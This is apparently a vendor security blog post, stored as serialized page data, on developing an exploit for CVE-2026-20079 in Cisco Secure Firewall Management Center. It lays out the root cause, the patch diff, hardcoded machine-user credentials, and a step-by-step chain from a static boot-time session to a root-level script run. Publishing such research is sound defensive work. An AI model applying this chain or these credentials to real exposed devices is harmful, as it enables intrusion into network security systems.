vulnerability in Cisco Secure Firewall Management Center\",\"VulnCheck's Initial Access Intelligence team developed an exploit that proved the vulnerability is exploitable but has significant prerequisites\",\"In this blog, our team walks through practical exploit development steps and the hurdles we encountered along the way\"]","mdi:check-bold",[184,1256,1257,1258,1263,1264,1268],{},"On March 4, 2026, Cisco published an advisory for CVE-2026-20079, a CVSS 10.0 vulnerability in Cisco Secure Firewall Management Center (FMC). Since Cisco networking gear tends to be a common adversary target, our Initial Access Intelligence team’s interest was immediately piqued. Censys ",[274,1259,1262],{"href":1260,"rel":1261},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.headers%3A%28key%3D%22Server%22+and+value%3A%22Mojolicious+%28Perl%29%22%29+and+host.services.endpoints.http.body%3A%22Management+Center%22+and+host.services.endpoints.http.body%3A%22%2Fimg%2Fcisco-icon.svg%22",[278],"finds"," about 300 Cisco FMC instances on the public internet, while FOFA ",[274,1265,1262],{"href":1266,"rel":1267},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=c2VydmVyPSJNb2pvbGljaW91cyAoUGVybCkiICYmIGJvZHk9Ik1hbmFnZW1lbnQgQ2VudGVyIiAmJiBib2R5PSIvaW1nL2Npc2NvLWljb24uc3ZnP3Yi",[278]," between 600 and 700 exposed systems. This blog goes into detail on the exploit development process for CVE-2026-20079, which was an unexpectedly wild ride.",[246,1270,1272],{"id":1271},"spoiler-the-end-result","Spoiler: The End Result",[184,1274,1275,1276,1280,1281,1284],{},"CVE-2026-20079 arises when a startup process on the FMC system creates a partial ",[1277,1278,1279],"code",{},"csm_processes"," session in the ",[1277,1282,1283],{},"sfsnort.sessions"," database. If no users authenticate after the system boots, the session persists and can be upgraded into permissions usable by an attacker, who could then call a significant set of CGI scripts.",[184,1286,1287],{},"VulnCheck identified that certain scripts could be chained such that a low-privileged session ID could be upgraded into a UI login session, after which RCE is possible via a multi-step process:",[227,1289,1290,1296,1311,1317,1324,1338],{},[230,1291,1292,1293,1295],{},"The ",[1277,1294,1279],{}," session is created in the database at boot and is marked as machine process with a static session ID, instead of a dynamic UUID like the rest of the system",[230,1297,1292,1298,1300,1301,1303,1304,1307,1308,1201],{},[1277,1299,1279],{}," session ID could be upgraded into a UI session via hardcoded credentials with the report user, which then uses the ",[1277,1302,1279],{}," session UI permissions to allow authentication. This creates a set of required session parameters that are needed for accessing the API calls, namely ",[1277,1305,1306],{},"sf_action_id",". The hardcoded machine user credentials are ",[1277,1309,1310],{},"report:snortrules",[230,1312,1313,1314,1316],{},"The report user session is then granted the rights to view the UI pages containing the ",[1277,1315,1306],{}," (no actual user privileges are assigned), which is extracted.",[230,1318,1319,1320,1323],{},"An arbitrary file write is conducted on sajaxintf.cgi via the all user-privileged validateLicense bulk AJAX API endpoint, which writes Unicode-escaped data to ",[1277,1321,1322],{},"\u002Fvar\u002Ftmp\u002Flicense.tmp",". For the purposes of our exploit, we wrote a special shell script with the \"Makeself\" Cisco-defined format that utilizes several hardcoded strings.",[230,1325,1326,1327,1330,1331,1334,1335,1337],{},"The shell script that we wrote to license.tmp is then executed by calling the \"all\"-privileged allowed ",[1277,1328,1329],{},"pjb.cgi"," endpoint with the ",[1277,1332,1333],{},"SF::UI::DataObjectLibrary::upgradeReadinessCall"," and calling the ",[1277,1336,1322],{}," shell script as the target.",[230,1339,1340,1341,1344],{},"The FMC system then processes the license.tmp file as an upgrade script and triggers an \"install\" process that ends up executing a ",[1277,1342,1343],{},"SF::System::Wrappers::RunCmd"," Perl function that runs the script as root.",[1346,1347,1349],"h3",{"id":1348},"exploitation-prerequisites","Exploitation Prerequisites",[184,1351,1352],{},"In order for the authentication bypass to succeed, the FMC host must have been rebooted, and the session must still exist in the database. Our team identified several instances where the required session will not be present, which would prevent exploitation until the system reboots. Any of the following may clear the injected session:",[227,1354,1355,1361,1364],{},[230,1356,1357,1358,1360],{},"Dashboard and widget interaction from authenticated users clears the \"old sessions,\" including the old ",[1277,1359,1279],{}," session",[230,1362,1363],{},"Cloud managed sessions interactioning with the web UI",[230,1365,1366,1367,1369],{},"Periodic cleanups are triggered on account authentication, which happens sporadically for the automated ",[1277,1368,1279],{}," user.",[184,1371,1372,1373,1377],{},"This means that it's likely the only time the target will be exploitable is shortly after boot, ",[1374,1375,1376],"em",{},"or"," on systems that aren’t commonly interacted with or directly authenticated to the web UI.",[246,1379,1381],{"id":1380},"root-cause-analysis","Root Cause Analysis",[184,1383,1292,1384,1389],{},[274,1385,1388],{"href":1386,"rel":1387},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-onprem-fmc-authbypass-5JPp45V2",[278],"Cisco advisory"," for CVE-2026-20079 states that:",[1391,1392,1393,1396],"blockquote",{},[184,1394,1395],{},"A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.",[184,1397,1398],{},"This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device.",[184,1400,1401,1402,1405],{},"To our hacker ears this says very little, and by not saying a lot, the things it ",[1374,1403,1404],{},"does"," say matter a ton:",[227,1407,1408,1411],{},[230,1409,1410],{},"The boot time statement tells me that something is up with session handling at system boot time",[230,1412,1413,1414,1416],{},"The vulnerability’s being unauthenticated immediately tells me that the boot time process enabled some session manipulation to reach management scripts, ",[1374,1415,1376],{}," that some hard-coded process allows a set of known values to be manipulated into a real session.",[184,1418,1419],{},"The only way to know was to dig in.",[184,1421,1422],{},"After patch diffing, a few things became apparent: The FMC system was a complex set of APIs that used Apache HTTPD redirects and proxy rewrites to access a large set of Perl, Java, and Go services running on the host, and the changes related to CVE-2026-20079 were relatively small.",[184,1424,1425,1426,1429],{},"The primary changes were to the Apache HTTPD configuration file and to the ",[1277,1427,1428],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm"," Perl Mojolicious CGI authentication handler, with a grand total of around 25 lines of code changed. Great, this should be easy, right? (This is a literary device called foreshadowing.)",[184,1431,1432,1433,1436,1437,1440,1441,1444,1445,1447],{},"The first change was to the ",[1277,1434,1435],{},"httpsd_conf.tt"," template located at ",[1277,1438,1439],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Fhtdocs\u002Ftemplates\u002Fhtml_templates\u002Fstig\u002Fhttpsd_conf.tt",". This is used as a template to generate the configuration for the Apache web service that functions as the main entry point for routing on FMC. The changes below show that the only addition was to add a check for whether the remote address is from the local system, and if it is, to set a ",[1277,1442,1443],{},"X-Auth-User-Type"," header to ",[1277,1446,454],{},":",[1449,1450,1455],"pre",{"className":1451,"code":1453,"language":1454},[1452],"language-text","SetEnvIf Remote_Addr ^127\\.0\\.0\\.1$|^::1$ request_is_local\nRequestHeader set X-Auth-User-Type 1 env=!request_is_local\n","text",[1277,1456,1453],{"__ignoreMap":148},[184,1458,1459,1460,1462],{},"A corresponding addition was made to the Perl authentication handling library at ",[1277,1461,1428],{},", which adds the following validation for the previously added header; if a session exists for an account and the header type does not match the expected user type, it will trigger an unauthorized error:",[1449,1464,1468],{"className":1465,"code":1466,"language":1467,"meta":148,"style":148},"language-perl shiki shiki-themes material-theme-lighter github-light github-dark monokai","# verify user type\nif ($session) {\n my $userTypeFromSession = $session->param('usertype');\n my $userTypeFromHeader;\n if (ref($q) eq 'Mojo::Message::Request') {\n $userTypeFromHeader = $q->headers->header('X-Auth-User-Type');\n } else {\n $userTypeFromHeader = $q->http('X-Auth-User-Type');\n }\n if (\n defined $userTypeFromHeader &&\n $userTypeFromHeader == AUTH_IS_USER &&\n defined $userTypeFromSession &&\n $userTypeFromSession != AUTH_IS_USER\n ) {\n my $username = $session->param('username');\n warn \"CheckLogin: Incorrect user type: $userTypeFromHeader != $userTypeFromSession ($username)\";\n return 0 if $hasReturnFlag;\n Unauthorized($q, $session);\n }\n}\n","perl",[1277,1469,1470,1479,1496,1534,1544,1578,1610,1622,1646,1652,1660,1671,1679,1689,1697,1703,1731,1771,1787,1803,1808],{"__ignoreMap":148},[1471,1472,1475],"span",{"class":1473,"line":1474},"line",1,[1471,1476,1478],{"class":1477},"ss7Ak","# verify user type\n",[1471,1480,1481,1485,1489,1493],{"class":1473,"line":149},[1471,1482,1484],{"class":1483},"sRxSC","if",[1471,1486,1488],{"class":1487},"ss--_"," (",[1471,1490,1492],{"class":1491},"swvn1","$",[1471,1494,1495],{"class":1487},"session) {\n",[1471,1497,1499,1503,1506,1509,1511,1514,1518,1521,1525,1529,1531],{"class":1473,"line":1498},3,[1471,1500,1502],{"class":1501},"sTNss"," my",[1471,1504,1505],{"class":1491}," $",[1471,1507,1508],{"class":1487},"userTypeFromSession = ",[1471,1510,1492],{"class":1491},[1471,1512,1513],{"class":1487},"session",[1471,1515,1517],{"class":1516},"sGXK2","->",[1471,1519,1520],{"class":1487},"param(",[1471,1522,1524],{"class":1523},"siCPE","'",[1471,1526,1528],{"class":1527},"sLACW","usertype",[1471,1530,1524],{"class":1523},[1471,1532,1533],{"class":1487},");\n",[1471,1535,1537,1539,1541],{"class":1473,"line":1536},4,[1471,1538,1502],{"class":1501},[1471,1540,1505],{"class":1491},[1471,1542,1543],{"class":1487},"userTypeFromHeader;\n",[1471,1545,1547,1550,1552,1556,1559,1561,1564,1567,1570,1573,1575],{"class":1473,"line":1546},5,[1471,1548,1549],{"class":1483}," if",[1471,1551,1488],{"class":1487},[1471,1553,1555],{"class":1554},"sMLJd","ref",[1471,1557,1558],{"class":1487},"(",[1471,1560,1492],{"class":1491},[1471,1562,1563],{"class":1487},"q) ",[1471,1565,1566],{"class":1554},"eq",[1471,1568,1569],{"class":1523}," '",[1471,1571,1572],{"class":1527},"Mojo::Message::Request",[1471,1574,1524],{"class":1523},[1471,1576,1577],{"class":1487},") {\n",[1471,1579,1581,1584,1587,1589,1592,1594,1597,1599,1602,1604,1606,1608],{"class":1473,"line":1580},6,[1471,1582,1583],{"class":1491}," $",[1471,1585,1586],{"class":1487},"userTypeFromHeader = ",[1471,1588,1492],{"class":1491},[1471,1590,1591],{"class":1487},"q",[1471,1593,1517],{"class":1516},[1471,1595,1596],{"class":1487},"headers",[1471,1598,1517],{"class":1516},[1471,1600,1601],{"class":1487},"header(",[1471,1603,1524],{"class":1523},[1471,1605,1443],{"class":1527},[1471,1607,1524],{"class":1523},[1471,1609,1533],{"class":1487},[1471,1611,1613,1616,1619],{"class":1473,"line":1612},7,[1471,1614,1615],{"class":1487}," } ",[1471,1617,1618],{"class":1483},"else",[1471,1620,1621],{"class":1487}," {\n",[1471,1623,1625,1627,1629,1631,1633,1635,1638,1640,1642,1644],{"class":1473,"line":1624},8,[1471,1626,1583],{"class":1491},[1471,1628,1586],{"class":1487},[1471,1630,1492],{"class":1491},[1471,1632,1591],{"class":1487},[1471,1634,1517],{"class":1516},[1471,1636,1637],{"class":1487},"http(",[1471,1639,1524],{"class":1523},[1471,1641,1443],{"class":1527},[1471,1643,1524],{"class":1523},[1471,1645,1533],{"class":1487},[1471,1647,1649],{"class":1473,"line":1648},9,[1471,1650,1651],{"class":1487}," }\n",[1471,1653,1655,1657],{"class":1473,"line":1654},10,[1471,1656,1549],{"class":1483},[1471,1658,1659],{"class":1487}," (\n",[1471,1661,1663,1666,1668],{"class":1473,"line":1662},11,[1471,1664,1665],{"class":1554}," defined",[1471,1667,1505],{"class":1491},[1471,1669,1670],{"class":1487},"userTypeFromHeader &&\n",[1471,1672,1674,1676],{"class":1473,"line":1673},12,[1471,1675,1583],{"class":1491},[1471,1677,1678],{"class":1487},"userTypeFromHeader == AUTH_IS_USER &&\n",[1471,1680,1682,1684,1686],{"class":1473,"line":1681},13,[1471,1683,1665],{"class":1554},[1471,1685,1505],{"class":1491},[1471,1687,1688],{"class":1487},"userTypeFromSession &&\n",[1471,1690,1692,1694],{"class":1473,"line":1691},14,[1471,1693,1583],{"class":1491},[1471,1695,1696],{"class":1487},"userTypeFromSession != AUTH_IS_USER\n",[1471,1698,1700],{"class":1473,"line":1699},15,[1471,1701,1702],{"class":1487}," ) {\n",[1471,1704,1706,1709,1711,1714,1716,1718,1720,1722,1724,1727,1729],{"class":1473,"line":1705},16,[1471,1707,1708],{"class":1501}," my",[1471,1710,1505],{"class":1491},[1471,1712,1713],{"class":1487},"username = ",[1471,1715,1492],{"class":1491},[1471,1717,1513],{"class":1487},[1471,1719,1517],{"class":1516},[1471,1721,1520],{"class":1487},[1471,1723,1524],{"class":1523},[1471,1725,1726],{"class":1527},"username",[1471,1728,1524],{"class":1523},[1471,1730,1533],{"class":1487},[1471,1732,1734,1737,1740,1743,1745,1748,1751,1753,1756,1758,1760,1762,1765,1768],{"class":1473,"line":1733},17,[1471,1735,1736],{"class":1554}," warn",[1471,1738,1739],{"class":1523}," \"",[1471,1741,1742],{"class":1527},"CheckLogin: Incorrect user type: ",[1471,1744,1492],{"class":1491},[1471,1746,1747],{"class":1487},"userTypeFromHeader",[1471,1749,1750],{"class":1527}," != ",[1471,1752,1492],{"class":1491},[1471,1754,1755],{"class":1487},"userTypeFromSession",[1471,1757,1488],{"class":1527},[1471,1759,1492],{"class":1491},[1471,1761,1726],{"class":1487},[1471,1763,1764],{"class":1527},")",[1471,1766,1767],{"class":1523},"\"",[1471,1769,1770],{"class":1487},";\n",[1471,1772,1774,1777,1780,1782,1784],{"class":1473,"line":1773},18,[1471,1775,1776],{"class":1483}," return",[1471,1778,1779],{"class":1487}," 0 ",[1471,1781,1484],{"class":1483},[1471,1783,1505],{"class":1491},[1471,1785,1786],{"class":1487},"hasReturnFlag;\n",[1471,1788,1790,1793,1795,1798,1800],{"class":1473,"line":1789},19,[1471,1791,1792],{"class":1487}," Unauthorized(",[1471,1794,1492],{"class":1491},[1471,1796,1797],{"class":1487},"q, ",[1471,1799,1492],{"class":1491},[1471,1801,1802],{"class":1487},"session);\n",[1471,1804,1806],{"class":1473,"line":1805},20,[1471,1807,1651],{"class":1487},[1471,1809,1810],{"class":1473,"line":50},[1471,1811,1812],{"class":1487},"}\n",[184,1814,1815,1816,1369],{},"These two changes let us know that the authentication bug relates to the \"user type\" and that any interaction with the web UI will force the user type to be a specific value. This, in turn, means that the authentication bug likely has to do with a non-",[1277,1817,1818],{},"AUTH_IS_USER",[184,1820,1292,1821,1824],{},[1277,1822,1823],{},"Auth.pm"," file defines a set of user types:",[1449,1826,1828],{"className":1465,"code":1827,"language":1467,"meta":148,"style":148},"use constant AUTH_IS_NONE => 0;\nuse constant AUTH_IS_USER => 1;\nuse constant AUTH_IS_MACHINE => 2;\n",[1277,1829,1830,1848,1861],{"__ignoreMap":148},[1471,1831,1832,1835,1838,1842,1845],{"class":1473,"line":1474},[1471,1833,1834],{"class":1483},"use",[1471,1836,1837],{"class":1487}," constant ",[1471,1839,1841],{"class":1840},"sHBcC","AUTH_IS_NONE",[1471,1843,1844],{"class":1516}," =>",[1471,1846,1847],{"class":1487}," 0;\n",[1471,1849,1850,1852,1854,1856,1858],{"class":1473,"line":149},[1471,1851,1834],{"class":1483},[1471,1853,1837],{"class":1487},[1471,1855,1818],{"class":1840},[1471,1857,1844],{"class":1516},[1471,1859,1860],{"class":1487}," 1;\n",[1471,1862,1863,1865,1867,1870,1872],{"class":1473,"line":1498},[1471,1864,1834],{"class":1483},[1471,1866,1837],{"class":1487},[1471,1868,1869],{"class":1840},"AUTH_IS_MACHINE",[1471,1871,1844],{"class":1516},[1471,1873,1874],{"class":1487}," 2;\n",[184,1876,1877,1878,1880,1881,1883,1884,1886,1887,1889],{},"So we also know that the vulnerability is likely related to the ",[1277,1879,1869],{}," user type, as the Apache changes force the web server interaction into a ",[1277,1882,454],{}," or ",[1277,1885,1818],{}," state. Time to start hunting for the potential users and authentication mechanisms for the ",[1277,1888,1869],{}," type.",[246,1891,1893],{"id":1892},"what-is-a-user-after-all","What is a User After All?",[184,1895,1896,1897,1900],{},"After searching the Perl code base and checking the database, we identified that the following are hardcoded user credentials that are extracted from the ",[1277,1898,1899],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Frepair_users.pl"," script:",[1449,1902,1904],{"className":1465,"code":1903,"language":1467,"meta":148,"style":148},"# Now create other system users\ncreate_user(\"report\", \"ReportUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"report\", \"snortrules\");\ncreate_user(\"sftop10user\", \"Top10User\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"sftop10user\", \"snortrules\");\ncreate_user(\"SRU\", \"SRUuser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"SRU\", \"snortrules\");\ncreate_user(\"Sourcefire\", \"SourcefireUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"Sourcefire\", \"snortrules\");\ncreate_user(\"csm_processes\", \"csm_processes\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"csm_processes\", \"csmdaemon\");\n",[1277,1905,1906,1911,1953,1975,2013,2033,2071,2091,2129,2149,2185],{"__ignoreMap":148},[1471,1907,1908],{"class":1473,"line":1474},[1471,1909,1910],{"class":1477},"# Now create other system users\n",[1471,1912,1913,1916,1918,1921,1923,1926,1928,1931,1933,1935,1937,1940,1942,1944,1946,1948,1950],{"class":1473,"line":149},[1471,1914,1915],{"class":1487},"create_user(",[1471,1917,1767],{"class":1523},[1471,1919,1920],{"class":1527},"report",[1471,1922,1767],{"class":1523},[1471,1924,1925],{"class":1487},", ",[1471,1927,1767],{"class":1523},[1471,1929,1930],{"class":1527},"ReportUser",[1471,1932,1767],{"class":1523},[1471,1934,1925],{"class":1487},[1471,1936,1767],{"class":1523},[1471,1938,1939],{"class":1527},"none",[1471,1941,1767],{"class":1523},[1471,1943,1925],{"class":1487},[1471,1945,1767],{"class":1523},[1471,1947,1939],{"class":1527},[1471,1949,1767],{"class":1523},[1471,1951,1952],{"class":1487},", SF::Auth::AUTH_IS_MACHINE, 0);\n",[1471,1954,1955,1958,1960,1962,1964,1966,1968,1971,1973],{"class":1473,"line":1498},[1471,1956,1957],{"class":1487},"change_password(",[1471,1959,1767],{"class":1523},[1471,1961,1920],{"class":1527},[1471,1963,1767],{"class":1523},[1471,1965,1925],{"class":1487},[1471,1967,1767],{"class":1523},[1471,1969,1970],{"class":1527},"snortrules",[1471,1972,1767],{"class":1523},[1471,1974,1533],{"class":1487},[1471,1976,1977,1979,1981,1984,1986,1988,1990,1993,1995,1997,1999,2001,2003,2005,2007,2009,2011],{"class":1473,"line":1536},[1471,1978,1915],{"class":1487},[1471,1980,1767],{"class":1523},[1471,1982,1983],{"class":1527},"sftop10user",[1471,1985,1767],{"class":1523},[1471,1987,1925],{"class":1487},[1471,1989,1767],{"class":1523},[1471,1991,1992],{"class":1527},"Top10User",[1471,1994,1767],{"class":1523},[1471,1996,1925],{"class":1487},[1471,1998,1767],{"class":1523},[1471,2000,1939],{"class":1527},[1471,2002,1767],{"class":1523},[1471,2004,1925],{"class":1487},[1471,2006,1767],{"class":1523},[1471,2008,1939],{"class":1527},[1471,2010,1767],{"class":1523},[1471,2012,1952],{"class":1487},[1471,2014,2015,2017,2019,2021,2023,2025,2027,2029,2031],{"class":1473,"line":1546},[1471,2016,1957],{"class":1487},[1471,2018,1767],{"class":1523},[1471,2020,1983],{"class":1527},[1471,2022,1767],{"class":1523},[1471,2024,1925],{"class":1487},[1471,2026,1767],{"class":1523},[1471,2028,1970],{"class":1527},[1471,2030,1767],{"class":1523},[1471,2032,1533],{"class":1487},[1471,2034,2035,2037,2039,2042,2044,2046,2048,2051,2053,2055,2057,2059,2061,2063,2065,2067,2069],{"class":1473,"line":1580},[1471,2036,1915],{"class":1487},[1471,2038,1767],{"class":1523},[1471,2040,2041],{"class":1527},"SRU",[1471,2043,1767],{"class":1523},[1471,2045,1925],{"class":1487},[1471,2047,1767],{"class":1523},[1471,2049,2050],{"class":1527},"SRUuser",[1471,2052,1767],{"class":1523},[1471,2054,1925],{"class":1487},[1471,2056,1767],{"class":1523},[1471,2058,1939],{"class":1527},[1471,2060,1767],{"class":1523},[1471,2062,1925],{"class":1487},[1471,2064,1767],{"class":1523},[1471,2066,1939],{"class":1527},[1471,2068,1767],{"class":1523},[1471,2070,1952],{"class":1487},[1471,2072,2073,2075,2077,2079,2081,2083,2085,2087,2089],{"class":1473,"line":1612},[1471,2074,1957],{"class":1487},[1471,2076,1767],{"class":1523},[1471,2078,2041],{"class":1527},[1471,2080,1767],{"class":1523},[1471,2082,1925],{"class":1487},[1471,2084,1767],{"class":1523},[1471,2086,1970],{"class":1527},[1471,2088,1767],{"class":1523},[1471,2090,1533],{"class":1487},[1471,2092,2093,2095,2097,2100,2102,2104,2106,2109,2111,2113,2115,2117,2119,2121,2123,2125,2127],{"class":1473,"line":1624},[1471,2094,1915],{"class":1487},[1471,2096,1767],{"class":1523},[1471,2098,2099],{"class":1527},"Sourcefire",[1471,2101,1767],{"class":1523},[1471,2103,1925],{"class":1487},[1471,2105,1767],{"class":1523},[1471,2107,2108],{"class":1527},"SourcefireUser",[1471,2110,1767],{"class":1523},[1471,2112,1925],{"class":1487},[1471,2114,1767],{"class":1523},[1471,2116,1939],{"class":1527},[1471,2118,1767],{"class":1523},[1471,2120,1925],{"class":1487},[1471,2122,1767],{"class":1523},[1471,2124,1939],{"class":1527},[1471,2126,1767],{"class":1523},[1471,2128,1952],{"class":1487},[1471,2130,2131,2133,2135,2137,2139,2141,2143,2145,2147],{"class":1473,"line":1648},[1471,2132,1957],{"class":1487},[1471,2134,1767],{"class":1523},[1471,2136,2099],{"class":1527},[1471,2138,1767],{"class":1523},[1471,2140,1925],{"class":1487},[1471,2142,1767],{"class":1523},[1471,2144,1970],{"class":1527},[1471,2146,1767],{"class":1523},[1471,2148,1533],{"class":1487},[1471,2150,2151,2153,2155,2157,2159,2161,2163,2165,2167,2169,2171,2173,2175,2177,2179,2181,2183],{"class":1473,"line":1654},[1471,2152,1915],{"class":1487},[1471,2154,1767],{"class":1523},[1471,2156,1279],{"class":1527},[1471,2158,1767],{"class":1523},[1471,2160,1925],{"class":1487},[1471,2162,1767],{"class":1523},[1471,2164,1279],{"class":1527},[1471,2166,1767],{"class":1523},[1471,2168,1925],{"class":1487},[1471,2170,1767],{"class":1523},[1471,2172,1939],{"class":1527},[1471,2174,1767],{"class":1523},[1471,2176,1925],{"class":1487},[1471,2178,1767],{"class":1523},[1471,2180,1939],{"class":1527},[1471,2182,1767],{"class":1523},[1471,2184,1952],{"class":1487},[1471,2186,2187,2189,2191,2193,2195,2197,2199,2202,2204],{"class":1473,"line":1662},[1471,2188,1957],{"class":1487},[1471,2190,1767],{"class":1523},[1471,2192,1279],{"class":1527},[1471,2194,1767],{"class":1523},[1471,2196,1925],{"class":1487},[1471,2198,1767],{"class":1523},[1471,2200,2201],{"class":1527},"csmdaemon",[1471,2203,1767],{"class":1523},[1471,2205,1533],{"class":1487},[184,2207,2208,2209,2212],{},"These hardcoded credentials corresponded to the hashes stored in the FMC system’s MySQL server in the ",[1277,2210,2211],{},"sfsnort.users"," database table, meaning that they are at least partially hardcoded. Immediately, our first instinct was to try authenticating with every authentication entry point we could find with these credentials, but no dice: Machine users are unable to authenticate to the web interface and are not allowed to interact with the routed API services. By inspecting theApache logs and packet captures, we could see that these processes were run locally, and each of these users would occasionally interact with portions of the API from the local machine perspective.",[184,2214,2215,2216,1201],{},"This gave us a few hints about where these machine user accounts were created and some of their common uses. The next step was to figure out what \"This vulnerability is due to an improper system process that is created at boot time\" meant in Cisco’s ",[274,2217,2219],{"href":1386,"rel":2218},[278],"advisory",[184,2221,2222,2223,2226,2227,2229],{},"During boot time, a few of the above accounts run scripts of the startup process for FMC. Only the Go binary ",[1277,2224,2225],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Fauth-daemon"," handles a large number of initial startup actions. One of the primary actions is to create a session for the ",[1277,2228,1279],{}," user to kick-off its first-start logic, which ends in the following database entry containing the Perl serialized session information:",[1449,2231,2235],{"className":2232,"code":2233,"language":2234,"meta":148,"style":148},"language-sql shiki shiki-themes material-theme-lighter github-light github-dark monokai","MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session\n| $D = {'username' => 'csm_processes','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','session_expire_check' => 1,'useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','usertype' => 2,'_SESSION_CTIME' => 1773962523,'_SESSION_ATIME' => 1773962523,'_SESSION_ID' => 'csm_processes','active' => 0,'_SESSION_REMOTE_ADDR' => '','_SESSION_EXPIRE_LIST' => {},'VMS_SESSION_ID' => 'csm_processes','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f'};;$D |\n","sql",[1277,2236,2237,2266,2271],{"__ignoreMap":148},[1471,2238,2239,2242,2245,2249,2252,2255,2259,2261,2264],{"class":1473,"line":1474},[1471,2240,2241],{"class":1487},"MariaDB [(none)]",[1471,2243,2244],{"class":1516},">",[1471,2246,2248],{"class":2247},"shWJe"," SELECT",[1471,2250,2251],{"class":1487}," a_session ",[1471,2253,2254],{"class":2247},"FROM",[1471,2256,2258],{"class":2257},"sQeA1"," sfsnort",[1471,2260,1201],{"class":1487},[1471,2262,2263],{"class":2257},"sessions",[1471,2265,1770],{"class":1487},[1471,2267,2268],{"class":1473,"line":149},[1471,2269,2270],{"class":1487},"| a_session\n",[1471,2272,2273,2276,2279,2282,2284,2286,2288,2290,2292,2294,2296,2299,2301,2304,2306,2308,2310,2313,2315,2317,2319,2322,2324,2326,2330,2332,2334,2337,2339,2341,2343,2346,2348,2350,2352,2354,2356,2358,2361,2363,2365,2368,2370,2372,2375,2377,2379,2382,2384,2386,2388,2390,2392,2395,2397,2399,2401,2403,2405,2407,2409,2412,2414,2416,2419,2421,2423,2426,2428,2430,2433,2435,2437,2440,2442,2444,2447,2449,2452,2454,2456,2458,2460,2462,2464,2466,2469,2471,2473,2475,2477,2479],{"class":1473,"line":1498},[1471,2274,2275],{"class":1487},"| $D ",[1471,2277,2278],{"class":1516},"=",[1471,2280,2281],{"class":1487}," {",[1471,2283,1524],{"class":1523},[1471,2285,1726],{"class":1527},[1471,2287,1524],{"class":1523},[1471,2289,1844],{"class":1516},[1471,2291,1569],{"class":1523},[1471,2293,1279],{"class":1527},[1471,2295,1524],{"class":1523},[1471,2297,2298],{"class":1487},",",[1471,2300,1524],{"class":1523},[1471,2302,2303],{"class":1527},"original_domain",[1471,2305,1524],{"class":1523},[1471,2307,1844],{"class":1516},[1471,2309,1569],{"class":1523},[1471,2311,2312],{"class":1527},"e276abec-e0f2-11e3-8169-6d9ed49b625f",[1471,2314,1524],{"class":1523},[1471,2316,2298],{"class":1487},[1471,2318,1524],{"class":1523},[1471,2320,2321],{"class":1527},"session_expire_check",[1471,2323,1524],{"class":1523},[1471,2325,1844],{"class":1516},[1471,2327,2329],{"class":2328},"sYThS"," 1",[1471,2331,2298],{"class":1487},[1471,2333,1524],{"class":1523},[1471,2335,2336],{"class":1527},"useruuid",[1471,2338,1524],{"class":1523},[1471,2340,1844],{"class":1516},[1471,2342,1569],{"class":1523},[1471,2344,2345],{"class":1527},"8acb8f4a-c40d-11e3-95aa-54f999c07ac9",[1471,2347,1524],{"class":1523},[1471,2349,2298],{"class":1487},[1471,2351,1524],{"class":1523},[1471,2353,1528],{"class":1527},[1471,2355,1524],{"class":1523},[1471,2357,1844],{"class":1516},[1471,2359,2360],{"class":2328}," 2",[1471,2362,2298],{"class":1487},[1471,2364,1524],{"class":1523},[1471,2366,2367],{"class":1527},"_SESSION_CTIME",[1471,2369,1524],{"class":1523},[1471,2371,1844],{"class":1516},[1471,2373,2374],{"class":2328}," 1773962523",[1471,2376,2298],{"class":1487},[1471,2378,1524],{"class":1523},[1471,2380,2381],{"class":1527},"_SESSION_ATIME",[1471,2383,1524],{"class":1523},[1471,2385,1844],{"class":1516},[1471,2387,2374],{"class":2328},[1471,2389,2298],{"class":1487},[1471,2391,1524],{"class":1523},[1471,2393,2394],{"class":1527},"_SESSION_ID",[1471,2396,1524],{"class":1523},[1471,2398,1844],{"class":1516},[1471,2400,1569],{"class":1523},[1471,2402,1279],{"class":1527},[1471,2404,1524],{"class":1523},[1471,2406,2298],{"class":1487},[1471,2408,1524],{"class":1523},[1471,2410,2411],{"class":1527},"active",[1471,2413,1524],{"class":1523},[1471,2415,1844],{"class":1516},[1471,2417,2418],{"class":2328}," 0",[1471,2420,2298],{"class":1487},[1471,2422,1524],{"class":1523},[1471,2424,2425],{"class":1527},"_SESSION_REMOTE_ADDR",[1471,2427,1524],{"class":1523},[1471,2429,1844],{"class":1516},[1471,2431,2432],{"class":1523}," ''",[1471,2434,2298],{"class":1487},[1471,2436,1524],{"class":1523},[1471,2438,2439],{"class":1527},"_SESSION_EXPIRE_LIST",[1471,2441,1524],{"class":1523},[1471,2443,1844],{"class":1516},[1471,2445,2446],{"class":1487}," 